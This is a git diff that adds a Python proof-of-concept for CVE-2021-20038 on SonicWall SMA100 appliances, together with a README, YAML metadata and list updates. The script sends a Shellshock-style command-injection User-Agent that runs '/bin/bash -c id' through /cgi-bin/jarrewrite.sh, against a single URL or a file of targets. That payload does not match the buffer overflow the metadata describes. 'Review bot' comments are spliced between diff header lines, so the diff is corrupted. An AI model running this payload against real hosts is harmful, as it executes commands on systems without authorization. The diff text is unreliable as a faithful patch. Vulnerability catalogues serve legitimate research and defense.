diff --git a/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py
new file mode 100644
index 0000000000000000000000000000000000000000..158cde4a1feb893fc5db6c875ad65aebaa03a0bb
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py
@@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+ print('baby test')
+
+def help():
+ print(' SonicWall RCE -h 查看帮助 ')
+ print(' SonicWall RCE -u 输入待检测url ')
+ print(' SonicWall RCE -f 输入待检测文件 ')
+
+def poc(url):
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+}
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print(res.text+url+"is vuln 漏洞存在")
+ else:
+ print(url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+def poc1(files):
+ for url in open(files):
+ url=url.strip()
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+ }
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print("[*] "+res.text+url+"is vuln 漏洞存在")
+ else:
+ print("[*] "+url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+if __name__ == '__main__':
+ try:
+ banner()
+ print('by baby')
+ cmd1=sys.argv[1]
+
+ if cmd1=='-h':
+ help()
+ elif cmd1=='-u':
+ cmd2=sys.argv[2]
+ poc(cmd2)
+ elif cmd1=='-f':
+ cmd2=sys.argv[2]
+ poc1(cmd2)
+ else:
+ print("请输入正确参数,或者-h查看帮助")
+ except:
+ print("输入-h查看帮助")
\ No newline at end of file
diff --git a/cve/apache/2021/CVE-2021-20038/README.md b/cve/apache/2021/CVE-2021-20038/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..8e3778dff37e6f1a8a91a54bb4f8b20d63e1cf23
--- /dev/null
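Review bot: The bare `except:` closing the `__main__` block catches every exception — the `IndexError` from a missing argument, but also `KeyboardInterrupt`, `SystemExit` and any failure raised inside `poc`/`poc1` — and prints the same '输入-h查看帮助' for all of them, so a real error is indistinguishable from a usage mistake; narrow it to `except IndexError:` and let the rest propagate. `poc1` repeats the body of `poc` line for line and never closes the handle returned by `open(files)`; it can collapse to `with open(files, encoding="utf-8") as fh:` / `for line in fh:` / `poc(line.strip())`, moving the `[*] ` prefix into `poc`. The check `"id" in res.text and res.status_code==200` in both functions is satisfied by almost any HTML page (an `id=` attribute is enough), so unaffected hosts are reported as '漏洞存在'; the result should be matched against the specific output the probe produces rather than a two-letter substring. `urllib3` and `urllib.parse` are imported but never used, `help` shadows the builtin, and `print(e)` in the handlers discards which URL failed.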
+++ b/cve/apache/2021/CVE-2021-20038/README.md
@@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件
+
+file内部的格式需添加http/https头
diff --git a/cve/apache/2021/yaml/CVE-2021-20038.yaml b/cve/apache/2021/yaml/CVE-2021-20038.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..4487857677758b85e49026069db15d0b76f0dc38
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-20038.yaml
@@ -0,0 +1,19 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+ name: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables.
+ severity: critical
+ description: |
+ A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+ scope-of-influence:
+ SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-20038
+ cwe-id: CWE-787, CWE-121
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021,Apache,RCE
\ No newline at end of file
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
similarity index 98%
rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml
rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml
index 0eab256c4dfe862200d680cff85dda2a1537ef4e..e3f384c6c24d7dba5f7d0ef6e46f8b0a2f653a79 100644
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
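Review bot: The new metadata file places this CVE under `cve/apache/2021/` with `tags: cve2021,Apache,RCE`, while its own `name` and `description` locate the bug in the SonicWall SMA100 appliance firmware (the mod_cgi handling of its bundled httpd), so anyone filtering the corpus by vendor will attribute a SonicWall firmware issue to the Apache HTTP Server project; a `sonicwall` tag, and ideally a vendor directory, would be less misleading, and the same attribution recurs in the `openkylin_list.yaml` hunk, which appends the id under what looks like the `apache` entry. The `reference` URL carries a `#match-7894400` fragment that is a transient NVD page anchor; the bare `https://nvd.nist.gov/vuln/detail/CVE-2021-20038` is the stable form. `cnvd-id: None` and `kve-id: None` are YAML strings rather than nulls, which matches the existing Zabbix file but is worth noting for consumers that test against `null`.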
@@ -1,20 +1,20 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
+id: CVE-2022-23131
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
 tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 7128c8a654f0511f8b057f1d715266e718f048c2..6ae5af394cefc594e6312c08ecbaf0ea2405704e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,6 +4,7 @@ cve:
 - CVE-2020-9490
 - CVE-2021-41773
 - CVE-2021-42013
+ - CVE-2021-20038
 apache-APISIX:
 - CVE-2022-24112
 - CVE-2021-45232